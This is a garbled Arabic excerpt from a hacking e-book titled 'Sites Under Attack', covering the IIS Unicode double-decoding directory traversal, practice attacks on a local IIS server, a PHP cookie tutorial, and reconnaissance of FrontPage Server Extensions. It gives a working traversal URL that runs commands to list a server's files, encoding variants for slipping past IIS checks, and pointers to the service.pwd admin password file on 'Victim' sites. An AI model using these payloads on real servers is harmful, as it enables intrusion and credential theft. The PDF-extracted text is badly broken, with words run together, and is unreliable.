فن حن بذلكنحاولان ن حسن و نلعبفى مسارات الدیریكتورز ولكنللاسف لا یمكنكتغییراو اللعبفى<br />
الدیریكتورز لانال iis مزودبخاصیه عمل check على مثل هذهالدیكودز و منعها من التنفیذ و هنا یقع<br />
اصلثغرهالیونىكود و هوالت حلیللمرتیناو لاكثر من مرهفهمتمقصد ىالاناىانال iis مزود فعلا<br />
بخاصیهال check على هذهالدیكودز ولكنانتتضع الثغره وبها اكثر منت حلیل واحدلنف ساسم<br />
الموقع ولذلك یقومال iisبوظیفته المعتاده و هىال check و المنع علىالدیكودالاول و یظهرلهان<br />
كل شئبخیر وانهیسیطر علىالموق ف خخخخخخخخ ولكن الحقیقهانهیعملال checkمره واحده<br />
فتكونالنتیجهانالدیكودالثانى ینجحتمامافى محاولهاللعبفىالدیریكتورز وبالتالى یكوننتیجه الدیكود<br />
الثانى هوان یرجعالىاصله ا ى( (slash /<br />
وتعالو ندخل ونتعمق اكثرفىتفاصیلالدیكودللثغره بعدان عرفنافكرتها ::<br />
شوفوفیه مادهاسمها <strong>com</strong>puter logic و الماده د ى راح درسفیها شئ یسمى HexaDecimal<br />
Valuesو هذهال valuesهىاساس الدیكود الذ ى نفعلهفىالثغرهاىانكل حر ف ص حیحاو حركه<br />
مثل /فى الكمبیوترلها ما یسمىبال hexتعالىاوض value حلكاكثر<br />
::<br />
<strong>١</strong><strong>١</strong>٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
مثلا: % ٢٠تعنى مسافه(space)<br />
هذا مثالبسیط واعتقدانكفهمتالانكلامى و طبعا یوجد جدوللهذهال hex values المساویه<br />
للحرو ف والحركاتالعادیهفى الكمبیوتر<br />
عوضا عنالحرو ف و الحركات العادیه الى السرفر و هذابالضبط ما نسمیهالت حلیلاوفك الشفرهاوال<br />
،اذناعتقدانكادركتتماماالانانكترسل hex values<br />
::<br />
decode<br />
تعالى نخ شفىتفاصیل الثغره اكثر و سنأخذالحركه التى نشرح علیها هىال ) (slash / حیثانها من<br />
اساسیات الدیكودفى هذهالثغره<br />
شو ففى جدولال hex value راح نجدانال<br />
فىانكتحذ فال /وتضعبدلا منها هذا فتنجحالثغره ولكنانااقوللك هذا خطأ لان هذاهو<br />
الدیقودالاول وانا ذكر تانالدیكود یحد ث مرتیناو ممكناكثریعنىلو وضعت هذا الدیكودالاولفستجد<br />
انال iisلدیهالقدره علىان یمسك هذاالدیكود و یمكنعه منالتنفیذ ولذلك علیناانن حلل هذاال value<br />
حتىیتمالدیكودالتانى فتنجحالثغره<br />
وبالنظر الى جدولال hexadecimal values شو ف نجد هذا<br />
/ = ٥% , c طبعا هذاهوالدیكودالاولالذ ى ستفكرالان<br />
ال value<br />
::<br />
% = %25<br />
5 = %35<br />
c = %63<br />
ثم<br />
وبالتالى نجدانفسناقد خدعناال iisبأننا checker حللناال شفره مرتین وبالتالىفسن حصلفى<br />
المقابل علىالاصل و هو / وبالتالىتكونقد نجحت الثغره<br />
.<br />
فهمتمالان شبابمعنى دیكودالعنوان مرتین وفهمتماساس الثغره والدیكود مرتینلیسمعناهتكرار<br />
الت حلیلالاول مرتین ولكنمعناهت حلیل وفكالت حلیلالاولا ى simplify الى ابسط واطول صوره ممكنه<br />
فى نفسالوقت<br />
و عشانتوضح اكثرمعك راحاحطلككی ف التركیبهالصحللت حلیل<br />
::<br />
%255c %25 = % 5 = 5 c = c = %5c<br />
%%35c % = % %35 = 5 c = c = %5c<br />
%%35%63 % = % %35 = 5 %63 = c = %5c<br />
%25%35%63 %25 = % %35 = 5 %63 = c = %5c<br />
c =/٥% :<br />
ارائیتمالت حلیل طبعافىالاخر یجبانیساو ىالدیكودالاصل و هوكما هة واضحفى مثالناكلالت حلیلات<br />
تساو ى %٥ cوكما ذكرنا / = %5c ولكننا حللنا هذاالرمزالىاطول وابسطت حلیل حتى نخدعال iis<br />
checker .<br />
وفى النهایه بعدفهمناللثغره واساسهاهیاتعالو نطبقها مع بع<br />
سو ف نضع الثغرهفى هذاالشكل<br />
ض<br />
::<br />
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s<br />
و ستدخلون علىالموقعبنجاح ولكن اكیدتلاحظون شئ جدیدقد زاد على الثغره و هذاالشىهوs/+<br />
<strong>١</strong><strong>١</strong>٨
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
هذا الرمز<br />
و عندماتدمج هذا الرمز معالثغرهكمافى المثال السابق سو فتأتیكلسته بكلفایلكبیر و صغیرفى<br />
كمبیوترالویب سرفر<br />
وااللهتعبتفى هذاالدرسوتعبتفىقرائهالمعلومات وتجمیعها عنالیونىكود حتىاصللهذاالشكل<br />
الاخوه وان شاءااللهانتظرو موضوعى القادم بعدمااكونانهی تامتحانىالاولفى) MCSE ادعولى<br />
اختراقها وفائدهال<br />
بالنجاح ( و سیكون عباره عنتلخی صللتعامل مع شبكات ویندوز<br />
٢٠٠٠ وكیفیه<br />
....WIN2000 RESOURCE KIT<br />
<strong>١</strong><strong>١</strong>٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
تدریب على عملیة الإختراق بواسطة الیونیكود<br />
"<br />
:<br />
$$$$$$$$$$$$$$$$$<br />
الكاتب: MaXhAk2000<br />
$$$$$$$$$$$$$$$$$<br />
بسماالله الرحمن الرحیم..<br />
كثرالكلام عن إختراقالمواقع بأنواعه والیوم عندي شرح عن ا لإختراق عن طریق الیونیكودأوبالأصح<br />
تطبیق عملي علىكیفیة ا لإختراق عن طریقالیونیكود وهذاالنو ع یعتبرللمبتدئین وهو الذيبإذنا الله<br />
سیوصلهمإلى طریق ا لإحترا ف.....<br />
***************************************************************************************<br />
بسماالله نبدأ...<br />
سیكونالتطبیق على جهازك وهو مثل الموقعأوالسیرفروتقوم بتطبیق الدرسكما وأنك على موقع<br />
مصاب.....<br />
لكيتتدرب علىإخت راقالمواقعقم بتركیب نظام ویندوز٢٠٠٠ على جهازك . وفي نفسالسیديتبعالنظام<br />
تقومبإ ضافة سیرفر IIS وذلك عن طریق<br />
قمبالذهابإلىلوحة التحكم.<br />
قمبالنقر علىإ ضافةإزالةبرامج.<br />
قمبالنقر على زر "إ ضافةإزالة مكونات ویندوز<br />
قمبوضع علامة صح علىا<br />
هذابالنسبةلكیفیةتنزیلالسیرفر..<br />
اما عنكیفیةالتدرب على الجهازأياختراقهفقمبالتالي:<br />
قمبوضعالموقعفي مجلد wwwroot الموجود داخل مجلد Inetpub طبعا هتدخل علیه بعد ماتشغل<br />
السیرفر IIS عن طریق<br />
http://127.0.0.1/<br />
ولإیجاد الثغرةفيالجهاز والتدرب علیهاقم بتشغیلبرنامج عمران سكانأوأيبرنامجاخرللفح ص عن<br />
الثغراتتبعالیونیكود وقمبوضع العنوانتبعكاليهو<br />
وقم بتطبیقالمهاراتالتيتعلمتهافياختراق المواقعالمصابةبالیونیكود...<br />
http://127.0.0.1/<br />
."<br />
لخیار الأول. IIS” “<br />
* <strong>١</strong><br />
* ٢<br />
* ٣<br />
* ٤<br />
<strong>١</strong> ٢٠
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
درس مفصل عن الكوكیز<br />
"<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$<br />
الكاتب Girl: Linux<br />
$$$$$$$$$$$$$<br />
مقدمة :<br />
^^^^^^<br />
منالوسائلالمفیدةفيانشاء مواقعاكثرتفاعلیة ،فبواسطتها ست مكن من<br />
تعدالكعكات (لا<br />
معرفة هلقامالمتصفح بزیارة موقعك منقبلاملا..<br />
cookies )<br />
<strong>١</strong>-<br />
في هذا الدرس سنتعر ف علىالكعكا ت وكیف یمكننااستخدامها...<br />
اقسام الدرس:<br />
معلومات عامة .<br />
٢-زراعةالكعكات على جهاز العمیل .<br />
٣ -قراءةالكعكات من جهازالعمیل<br />
٤-تطبیق :تخصی صلونالخلفیة.<br />
<br />
معلومات عامة<br />
^^^^^^^^<br />
.<br />
-ماهي ملفاتالكوكیز ؟<br />
^^^^^^^^^^^^^^<br />
ملفاتالكوكیز عبارة عن ملفات نصیة ،تقومالمواقع التيتزورهابإیداعها علىالقر صالصلبفي<br />
جهازك، وتحتوي هذهالملفاتالنصیة علىمعلوماتتتیحللموقعالذيأودعهاأن یسترجعها عندالحاجة ،<br />
أي عند زیارتكالمقبلةللموقع .<br />
وتختل فالمعلوماتالتيتخزن ضمن ملفات الكوكیز من موقع لآخر ، ولكنلیس بإ مكان هذهالمواقع<br />
استرجا عأيمعلوماتإ ضافیة عنكأو عن جهازك ،باستثناءتلكالمعلوماتالمخزنةفيالمل فالنصي<br />
الخا صبها ، والتيتمإرسالها منقبلالموقع ، وبذلك لاتستطیع هذهالمواقعالاطلا ع على مضمون ملفات<br />
الكوكیزالأخرى ،أوأي ملفات خاصة على جهازك .<br />
-كی فیتمإیدا ع ملفات الكوكیز على جهازك ؟<br />
یرسلالمتصفح ، عندإدخالك عنوان موقعفي شری ط العناوین ، طلباًإلىالموقعالذي حددته، متضمناً<br />
عنوان IP الخا صبه ، ونو عالمتصفحالذيتستخدمه ، ونظامالتشغیل الذي یدیر جهازك .تخزّ ن هذه<br />
المعلوماتفي ملفات خاصةبالمزود ، Files Log ولا علاقةللكوكیزبالمعلوماتالتيیتمإرسالها<br />
الوقت ذاته یبح ثالمتصفح عن ملفاتكوكیز ، التيتخ ص الموقعالمطلوب ،فإ ذا وجدهایتمإرسالها مع<br />
طلب مشاهدةالموقع ، وإ ذالمتوجد ،فإ نالموقع سیدركأن هذه زیارتك الأولىإلیه ،فیقومبإرسال ملفات<br />
الكوكیزإلى جهازك لتخزن علیه .<br />
. وفي<br />
<strong>١</strong>٢<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
وبإ مكانالموقعتغییرالمعلوماتالموجودة ضمن ملفاتالكوكیزأوإ ضافةمعلومات جدیدةكلماقمت بزیارة<br />
الموقع .یتمتخزین بع ض ملفاتالكوكیزفي الذاكرةفقط ،ب حیث یجري حذفها مباشرة عندإغ لاقك<br />
المتصفح ، ولكنمعظمهاوتسمى "ملفاتالكوكیزالمثابرة" ،یتمتخزینهالفترة محددة علىالقر صالصلب<br />
ل حینانتهاء صلاحیتها وقدتدوم صلاحیتها مدةأشهرأو حتى سنوات .أما بع ض ملفا تالكوكیزالتي<br />
تعر ضتاریخ صلاحیة لتاریخ سابق ،فإنهاتُ حذ ف مباشرة ولاتُ خز َّن علىقرصكالصلب<br />
المعلوماتالمخزنةفي ملفاتالكوكیزإلىمزودات الموقع الذيأصدرهافق ط، وقدتعمم بع ضالشركات<br />
الكبرى ملفات الكوكیز التيتصدرها على جمیعمزوداتها، لتنسیق المعلومات المتضمنة ، ولكي لاتصدر<br />
كل منمزوداتها ملفاتكوكیزللمستخدم ذاته ، عند زیارتهلصفحات مختلفةفيالموقع.<br />
. وتعود<br />
- مكونات مل فالكوكیز :<br />
^^^^^^^^^^^^^^<br />
یتكون عادة من عدةاجزاء هياسم المل ف ،قیمته،تاریخانتهاء مفعوله ، الموقعالمالكله ...<br />
زراعةالكعكات على جهاز العمیل : -<br />
أولا :كی فتزر ع ملفات الكعكات<br />
یتم ذلكباستخدام الدالة setcookie وتعریفهابالشكلالتالي :<br />
:<br />
code:<br />
boolean setcookie ( string name [, string value [, int expire<br />
[, string path [, string domain [, int secure]]]]])<br />
تهمناالمدخلا ت الثلا ثالاولى و هي :<br />
: nameاياسم الكعكة ...فبامكانكارسال اكثر من كعكةالى متصفح واحد و عندها یصبحالاسم هو<br />
الطریقةالوحیدةللتمییز .<br />
: valueالقیمة<br />
...فقطقیم نصیة ...لا یمكنك وضع مصفوفةكقیمة و هذاأامر مهم ...لكنانتبهبامكانك<br />
وضع مصفوفةلكنبط ریقةاخرى ...؟كی ف ؟ :استخدمالدالة serialize لتحویلاي متغیرفيبي ات ش<br />
بيالى شكل نصي و منثماستخدم unserializeلاعادتهالىالشكلالطبیعي.<br />
) <strong>١</strong> ینایر<br />
.<br />
--><br />
: expireاي عددالثواني منبدیة عصرالیونكس ( <strong>١</strong>٩٧٠ والتي بعدها سیقومالمتصفح<br />
على جهاز المستخدمبحذ ف الكعكة ... و هناثلا ث حالا ت:<br />
أولاً :أن یكون الوقت المعطىكمدخل اكثر من الوقت الحالي على جهاز العمیل و عندهاتخزن الكعكة<br />
على جهازالعمیل وتحذ ف عندانقضاءالمدة<br />
<strong>١</strong>٢٢
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
--><br />
ثانیاً :أن یكونالوقتالمعطىكمدخلاقل منالوقت على جهازالعمیل و عندها لا یقوم المتصفح على<br />
جهازالعمیل بتخزینها واذا وجدت كعكةبنفسالاسمفانه یحذفها حتىلولمتنتهي المدة<br />
ثالثاً :إ ذالمتحدد وقتافانالكعكةتخزنفي ذاكرة المتصفح وتفقد حالما یغلق المستخدم الموقع .<br />
.<br />
--><br />
: مثال<br />
code:<br />
<br />
منالدوالالمفیدة دالة time والتيترجعالوقتالحالي على شكل عدد الثواني منبدایة عصرالیونكس<br />
<strong>١</strong>) ینایر .(<strong>١</strong>٩٧٠<br />
ثانیاكیفتحذ فاوتعدل كعكة:<br />
لكيتحذ ف كعكة علیكأنترسل كعكةبنفس الاسم و خالیةالقیمة و ذات وقتاقل منالوقت على جهاز<br />
المستخدم<br />
مثال:<br />
code:<br />
<br />
ملاحظات :<br />
<strong>١</strong>- عندماتحددزمنا ماضیاًاجعلهقیمةكبیرةلكي تتفاد ىفارقالتوقی تبینالخادم والعمیل<br />
٢-لكيتعدلأي كعكة علیك حذفها وإرسالها من جدید .<br />
.<br />
ملاحظة مهمة :<br />
یجبانتستدعيالدالة setcookieقبلأنترسلاي شيءالىالمتصفح ..فمثلا الكودالتاليلنینجح<br />
:<br />
code:<br />
<strong>١</strong>٢٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<br />
<br />
<br />
<br />
<br />
بللوكان هنالك مجرد سطرفار غقبل علامة البدایة ؟ <br />
<br />
<br />
<strong>١</strong>٢٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
قراءةالكعكا ت من جهاز العمیل :<br />
-كی فتستقبلالمتغیرا ت من الكعكة<br />
..<br />
-:<br />
^^^^^^^^^^^^^^^^^^^^^<br />
مثال<br />
قلنابانهبامكانك ارسال اكثر من كعكةالى متصفح واحد<br />
عندما یطلبالمستخدم من متصفحهِ صفحة على موقعكفانالمتصفح یقومبارسال جمیعالكعكاتالتيقمت<br />
ان ت بزراعتها عند المستخدم PHP ...تسهل علیكقراءة هذه الكعكات وتخزنهافي مصفوفةاسمها<br />
$_COOKIEو هي مصفوفة منالنو ع Associativeب Arrays حیثان المفتاح هواسمالكعكة و<br />
القیمةقیمة الكعكةكماارسلتها .<br />
:<br />
code:<br />
<br />
: و هذهتطبع<br />
code:<br />
palhackerz.<strong>com</strong><br />
تطبیق :تخصی صلون الخلفیة<br />
كمثالبسیط دعنا نقومبانشاء موقع مبسط و نستخدم الكعكاتلكي نحفظلونالخلفیةالمحببةالىالشخ ص<br />
..<br />
-ماذالدینا ؟<br />
<strong>١</strong>-المل ف : user.php یقوم المل ف بعملیتین<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<br />
<br />
<br />
<br />
<br />
<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
value=" INPUT>لا type="submit" تتذكرلوني المفضل" ><br />
<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
function clear_color(){<br />
setcookie('color',$_GET['color'],time()-36000);<br />
header('Location:index.php');<br />
}<br />
// selection<br />
if ($do=='display_form'){<br />
display_form();<br />
}elseif ($do=="set_color"){<br />
set_color();<br />
}elseif ($do=="clear_color"){<br />
clear_color();<br />
}<br />
?><br />
-الدالةالاولى display_formتقومفق ط بعر ض نموذجاختیاراللون .<br />
-الدالةالثانیة set_colorتقومبحفظاللون المختارفيكعكة وترجعالمستخدمالىالصفحةالرئیسیة .<br />
-الدالة الثالثة get_colorترجعقیمة اللون منالكعكة واذالم یكنهنالكقی مةفانهاترجعلون<br />
افتراضي وهوالابی ض .<br />
-الدالة الرابعة clear_colorتقومبمسحالكعكةبالطریقة التي ذكرناهافيالدرس .<br />
- ٢ مل ف ال : index.php<br />
مل ف عادي جداًالاانهیطلب الدالة get_color من مل ف user.phpكما یلي :<br />
<strong>١</strong>٢٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
code:<br />
<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
معلومات مهمة عن المواقع التي تدعم الفرونت بیج<br />
"<br />
$$$$$$$$$$$$$$$$$$$<br />
T.O.L. ( DeXXa )<br />
$$$$$$$$$$$$$$$$$$$<br />
الكاتب:<br />
ماالذي یجبأنتعرفهقبلقراءة هذاالدرس<br />
*الالمامبالانجلیزیة<br />
*قراءة المزید عن ال<br />
:<br />
.<br />
FrontPage Server Extensions ولی سكیفیةاختراقه .<br />
*كیفیة التعامل معبرنامج . Microsoft Office FrontPage<br />
*كیفیة التعامل مع ال . CHMOD<br />
*كیفیة التعامل مع ال<br />
*كیفیة التعامل معبروتوكول . HTTP<br />
*كیفیة التعامل معقواعدالبیانات العلائقیة . SQL<br />
*كیفیة التعامل معأحدلغات الویب و التيتعملبناحیة الخادم<br />
Server Side Scripting<br />
. Telnet<br />
. Language<br />
واذكرأ خیراً بأنياؤمن بأنالمخترق ماهوإلاانسان وظ یفتهالبرمجة وادارة وت حلیلالنظم والشبكا ت و<br />
لیسانسان همه هومعرفةالقلیل<br />
منالأمورالتيتساعدهفيالتخریب و العبثبماتعببهالآخرون وتضییعالوقتفي الدردشة و التسكع<br />
بمقاهيالانترن ت ، ولذافافتر ض بأن ما أقوله سیكون واضحاً و لا یحتاجل . Screen Capture<br />
خریطة الموضو ع<br />
:<br />
@<br />
<br />
. ماالذي ستسفیده عندقراءةالموضو ع ؟<br />
FrontPage Server Extensions ؟<br />
FrontPage Extension Server ؟<br />
FrontPage Extension Server<br />
. مقدمة<br />
. ما هو ال<br />
. ما هي آلیة عمل ال<br />
.كیفیةالاتصالب<br />
.كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا<br />
.كیفیةاستغلالهلیصبحفي صلاحك<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
@ ماالذي ستستفیده عندقراءتكللموضو ع ؟<br />
* ستعر ف ما هوال<br />
آلیة عمله<br />
*كیفیة جمع المعلومات الخاصة بأي موقع<br />
* بع ضالطرقللاستفادة منه عندالاتصالبالخادم الخا صبه<br />
. FrontPage Server Extensions<br />
.<br />
.<br />
.<br />
*<br />
<strong>١</strong>٣٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
: مقدمة<br />
@<br />
تسعى شركاتالتسكین بأنواعهاتوفیر شتى شبلالراحة لعملائها، فتجدهم یقدمونالعرو ض والتخفیضات<br />
لارضاءالعملاء مثل دعمل PHP و<br />
. SQL و FTP و SSL و Perl و CGI<br />
وبالنسبةلمدارءالمواقع Webmastersفإ نالبرنامجالمفضللهم لتصمیم مواقعهم هو<br />
Office FrontPage والذيكما هو مبین یأتي<br />
معحزمة Office ،اذیتمیزبسهولةا ستعمالهكماانه یوفر بع ض البرمجیات مثل عداد الزوار ، ولذا<br />
تقدم شركاتالتسكین دعمكاملللبرنامج<br />
@ ما هوال<br />
Microsoft<br />
.<br />
FrontPage Server Extensions ؟<br />
ملاحظة<br />
سأتكلم حالیاً عنالحزم التيأتت بعدحزمةالاصدار الثاني<br />
(<br />
:<br />
)<br />
.<br />
هو عبارة عنحزمة من البرامجیتمتثبیتهافي الخادم Serverالخا صبشركةالتسكین التيلهاقالبیة<br />
لدعم بع ضالخصائ ص<br />
و عندالتثبی ت یجبانشاء عدة مجلدا ت منها<br />
:<br />
private_/<br />
vti_bin_/<br />
vti_cnf_/<br />
vti_log_/<br />
vti_pvt_/<br />
vti_txt_/<br />
و سأتكلم عن وظ یفةكل مجلد یهمنا<br />
*المجلد<br />
:<br />
: vti_bin_<br />
ویتواجدبداخله مجلدان هما<br />
:<br />
ملاحظة :النقطتانتشیرانإلىالمجلد<br />
( vti_bin_<br />
)<br />
/vti_adm_/..<br />
/vti_aut_/..<br />
الثاني لا یهمنا بقدر ما یهمالمجلدالأولاذأنه الخا<br />
علىكلمةالمرور الخاصةبه<br />
كما یوجد ملفانهما<br />
صبالمشر ف ولاتستطیعالاستفادة منهاذالمت حصل<br />
.<br />
:<br />
<strong>١</strong>٣<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
shtml.exe/..<br />
fpcount.exe/..<br />
*المجلد<br />
: vti_pvt_<br />
ویتواجدبداخله عدة ملفات ما یهمنا منهاهو الملفاتالتالیة<br />
:<br />
-المل ف : service.pwd وفیهیتواجدالمعر ف وكلمة المرورالخاصةبالمشر ف مشفرةبمقیاس<br />
. authors<br />
. DES<br />
-المل ف : service.grp وفیهیتواجد المعرفین من مشرفین و<br />
: doctodep.btr وفیهیتواجد مسارات الملفاتالتيتمتحمیلها على<br />
الخادم ،فاذاقمت بتنزیله فتستطیعمعرفة الملفات<br />
الموجودةبالموقع .<br />
- ملفي deptodoc.btr و<br />
وفي الغالب لاتستطیعمعاینة محتویات المجلداذ یوجدفيالمجلدالرئیسيللموقع مل ف<br />
یقومبمنعالجمیع (المالك والمجموعة و<br />
الزوار منمعاینة المجلد و محتویاته<br />
htaccess.<br />
.<br />
(<br />
ملاحظة :ان عدم وضعأي صلاحیة على المجلدلایعني بأنهاتعتبرثغرة ولكنضع ف منالناحیة<br />
(<br />
)<br />
*المجلد<br />
: private_<br />
ویتواجدبداخله مل ف واحدفقطهو.htaccess .<br />
ما هي آلیة عم لال<br />
FrontPage Extension Server ؟<br />
@<br />
یعتمدالاتصالبینالعمیل وال<br />
. HTTP علىبروتوكولال FrontPage Extension Server<br />
فلواردنامعاینة عدادالزوار عن طریقبرنامجال FrontPageفانهیتمارسال طلب Request<br />
للخادمثم یمررهالخادمبال<br />
و الذي یمررهبالتالي ببرمجیاتالخادم مثل ، fpcount.exe و منثم یكررتمریره مرةأخر ىإلىال<br />
Extension Server وإلىالخادم و یظهر المخرجات<br />
لالعمیل ، علماًان هذهالاتصالات تتم عبر جدار نار .<br />
@كیفیةالاتصالب<br />
FrontPage Extension Server<br />
: FrontPage Extension Server<br />
.<br />
كما ذكرنا سابقاًانأغلب شركاتالتسكینتسعىلراحة العملاء، فتجدهاتدعم خدمة ال FrontPage و<br />
ذلك لتحمیلالصفحا تللموقع علماً بأنها<br />
تدعمبروتوكولال FTP وتحمیلالملفات وانشاءالمجلدات عبرالمتصفحاعتماداً علىالبرمجیاتالتي<br />
تعملبناحیةالخادم<br />
والآنقم بتنفیذالتاليلمعرفةكیفیةالاتصالبال<br />
: FrontPage Extension Server<br />
<strong>١</strong>٣٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ملاحظة )<br />
الشكلیة<br />
:<br />
(<br />
سأتكلم حالیاً عنحزمة ال XP والتي لاتختل فأبداً عنالحزمالباقیةإلافي بع ض النقاط<br />
. Office<br />
*<br />
*قم بتشغیلبرنامجال FrontPage و الذي یأتي مرفقاً معحزمة<br />
منقائ مة<br />
*قمباضافة المعر ف وكلمةالمرور (الأصلیة ولیستالمشفرة<br />
*اذاكانت ص حیحة سیظهرلك الخادم ملفاتالموقعكلها و عندهاتستطیعالتحمیل والتعدیلفيالملفات و<br />
المجلداتومعاینة الشفرةالمصدریة<br />
للملفات<br />
*اذالم تتمالعملیةبنجاحفهذایعني بأنالموقع لا یدعم الخدمةأوأنالمعر فأوكلمةالمرور خاطئة و<br />
یطلب منكمعاینتهافي وضعیةالقراءة و لا<br />
یظهرلك الشفرةالمصدریةالأصلیة ولاالمجلدات و الملفات التي یحویها الموقع .<br />
. (<br />
. Open Web Fileقمباختیار<br />
.<br />
@كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا<br />
:<br />
یوجد العدید منالطرقلمعرفةقابلیة الموقعلدعمالفرون تبیج نذكر منها<br />
:<br />
*<br />
معاینة مل ف نجاحالتثبیت<br />
:<br />
(<br />
)<br />
ملاحظة :قد لاتجد مل ف vti_inf.html_ ولكن هذالایعنيأنالموقع لا یدعم الخدمة ،كماأنه لا<br />
یعتبرثغرة<br />
-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا .<br />
-قمبمعانیة مل ف _vti_inf.htmlبواسطةالمتصفح و ذلكبارفاقه بعنوان الموقع ، مثال<br />
:<br />
http://www.Victim.<strong>com</strong>/_vti_inf.html<br />
- و عندمعاینةالصفحة ستجد جملة FrontPage Configuration Information ،فهذامعناه<br />
أنحزمة ال<br />
في الخادمبنجاح<br />
FrontPageقدتمتثبیتها Extension Server<br />
.<br />
ولمعرفةاصدارةالخدمةقمبالتالي<br />
. Source Code<br />
:<br />
-قمبالنقر بزرالفأرة الأیمن علىالصفحة ،ثمقمباختیار<br />
-قمبالب حث عن "FPVersion="Version حیث Versionتشیرللاصدار الخا صبالخدمة<br />
* عن طری ق مجلد<br />
.<br />
: vti_cnf_<br />
-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا<br />
-قمبمعانیةالمجلدبواسطةالمتصفح و ذلكبارفاقه بعنوانالموقع ، مثال<br />
.<br />
:<br />
http://www.Victim.<strong>com</strong>/_vti_cnf<br />
<strong>١</strong>٣٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-قمبالنقر بزرالفأرة الأیمن علىالصفحة ،ثمقمباختیار<br />
-قمبالب حث عن الشفرةالتالیة<br />
. Source Code<br />
:<br />
vti_generator:Programe<br />
- حیث Programe یشیرلنو ع البرنامج واصدارته و سیكونفي حالتنا هو Microsoft<br />
. X والاصدارة الخاصةبههي FrontPage X<br />
*الكش ف عنالشفرةالمصدریةللصفحة<br />
:<br />
-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا<br />
-قمبالنقر بزرالفأرة الأیمن علىالصفحة ،ثمقمباختیار<br />
-قمبالب حثبینترمیزيالرأس عنالشفرةالتالیة<br />
.<br />
. Source Code<br />
:<br />
<br />
- حیث Programe یرم<br />
زلنو عالبرنامج واذاكان البرنامجهو<br />
یتبینلنا بأن الخادمالخا صبالموقع یدعم الفرون تبیج و<br />
Microsoft FrontPage X.0<br />
الاصدارةالخاصةبه هي . X<br />
* عن طریق موقع<br />
: NetCraft<br />
. NetCraft.net<br />
.<br />
-قم بزیارة الموقع<br />
-قم بكتابة عنوان الموقع مستثنیاًال //:http .<br />
-انتظربضعثواني<br />
- ستجدأن الموقعأعطاك بع ض المعلومات عنالملقم والخدمات الموجودةفي الموقع الذيتریدمعرفة<br />
قابلیة دعمهللبرنامج ، و منتلكالخدمات<br />
خدمة ال FrontPage و ستظهرلكبالشكل mod_frontpage/X حیث X یرمز لاصدارةال<br />
. FrontPage Extensions Server<br />
* عن طریق ال<br />
: Telnet<br />
(<br />
)<br />
ملاحظة :تساعد هذه الطریقةفيمعرفة بع ضالمعلومات عن الخادم و المخرجاتهي نفس مخرجات<br />
الطریقة السابقة<br />
- منقائمة<br />
Startقمباختیار Run و اكتببالنافذة التي ستظهر<br />
-قمبالاتصالبالموقع عبرالمنفذ ٨٠بالشكلالتالي<br />
. Telnet<br />
:<br />
